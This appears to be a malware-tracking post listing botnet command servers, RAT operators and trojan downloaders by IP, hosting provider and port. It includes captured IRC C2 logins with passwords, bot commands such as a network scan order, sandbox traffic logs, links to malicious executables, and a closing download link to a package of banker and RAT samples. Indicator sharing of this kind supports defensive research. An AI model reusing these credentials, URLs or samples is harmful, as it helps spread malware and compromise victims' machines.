Remote Host Port Number 194.247.48.58 47221 PASS ngrBot or PASS letmein 213.251.170.52 80 64.120.161.214 80 NICK n{US|XPa}kngcdtw USER kngcdtw 0 0 :kngcdtw JOIN #ngr ngrBot PRIVMSG #ngr :[MSN]: Updated MSN spread interval to “8” PRIVMSG #ngr :[MSN]: Updated MSN spread message to “http://rapidshare.com/files/455562571/Picture5437.JPG-.com” PRIVMSG #ngr :[d=”http://websoftwarecentral.in/install.48208.exe” s=”79872 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp” –
74.117.174.122(botnet hosted in United States Seattle Kwshells Internet Services)
74.117.174.122 16667 Nick [AUT]XP-SP3[00]1637 User qdnip Channel #l# * Now talking in #l# * Topic is ‘.advscan asn445 100 5 800 -b -r -s ‘ * Set by net{out} on Mon Mar 28 02:51:30 infos about hosting: http://whois.domaintools.com/74.117.174.122
92.241.164.191(botnet hosted in Russian Federation 2x4.ru Network)
92.241.164.191 8718 Nick iRCBpCcp User imegnmev Channel #c * Now talking in #c * Topic is ‘=YAkqI6shDgtWfdpShKEqhe91ihDqfdJHG+e1RwymEerIvbHlnlEw1FLT5QzEyymeqUJLok/mEx8bN/3vzdkBF0szOfdFUxl ‘ * Set by febreg on Fri Apr 01 09:57:47 infos about hosting: http://whois.domaintools.com/92.241.164.191
sharedfud.dyndns-work.com(rat user from Peru Lima Tdperx3-lacnic)
el peruviano hecker here sharedfud.dyndns-work.com 200.106.35.109 sountracker.dyndns-mail.com 200.106.35.109 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3461 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3460 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3460 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3461 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3461 Outgoing connection
173.242.123.150(botnet hosted in United States Clarks Summit Volumedrive)
Remote Host Port Number 173.242.123.150 2235 PASS wiggernet Current Local Users: 160 Max: 630 Current Global Users: 160 Max: 483 MODE LNO|746499630 -ix JOIN #likenoneother# boss USERHOST LNO|746499630 PONG :MrWiiWii.IRC.NET NICK LNO|746499630 USER wlnmyriwl 0 0 :LNO|746499630 infos about hosting: http://whois.domaintools.com/173.242.123.150
dl.sd.keniu.com(trojan downloader hosted in China Jinan China Unicom Shandong Province Network)
dl.sd.keniu.com dl.sd.keniu.com 123.235.32.185 stat.sd.keniu.com stat.sd.keniu.com 219.232.254.35 Outgoing connection to remote server: dl.sd.keniu.com TCP port 80 Outgoing connection to remote server: 123.235.32.247 TCP port 80 Outgoing connection to remote server: 218.29.42.138 TCP port 80 Outgoing connection to remote server: stat.sd.keniu.com TCP port 80 exe file http://www.multiupload.com/SGDN1Z6H3Q virustotal scan http://www.virustotal.com/file-scan/report.html?id=22ccc8633a1c0b255aa07459b5343b4ab24c07e3e0fe15a7f1b23e8dd86b43cf-1301688919 infos about hosting: http://whois.domaintools.com/219.232.254.35 http://whois.domaintools.com/123.235.32.247
blackshades.info(stealer hosted in United States Chicago Hosting Services Inc)
blackshades.info 173.192.176.139 Outgoing connection to remote server: blackshades.info TCP port 8080 Outgoing connection to remote server: blackshades.info TCP port 8080 exe file http://www.multiupload.com/ORXAMUSALM infos about hosting: http://whois.domaintools.com/173.192.176.139
khant14.sytes.net(rat user from United States Warrensburg Charter Communications)
American hecker here khant14.sytes.net 75.134.34.140 Outgoing connection to remote server: khant14.sytes.net TCP port 71 Outgoing connection to remote server: khant14.sytes.net TCP port 71 exe file http://www.multiupload.com/9T08BMWN6C infos about hecker http://whois.domaintools.com/75.134.34.140
client.vpn8.info(chinese malware hosted in China Guangdong Chinanet Guangdong Province Network)
client.vpn8.info DNS_TYPE_A 119.145.115.77 YES udp – HTTP Conversations: From ANUBIS:1029 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/vpnlist.txt Response: 200 “OK” From ANUBIS:1030 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/top.htm Response: 200 “OK” From ANUBIS:1031 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/gonggao.htm Response: 200 “OK” From ANUBIS:1032 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/vpn.jpg Response: 200
Around 14 MB of malware samples
Here you go with another malware package, mostly bankers and RATs. Download: http://018a2ff9.whackyvidz.com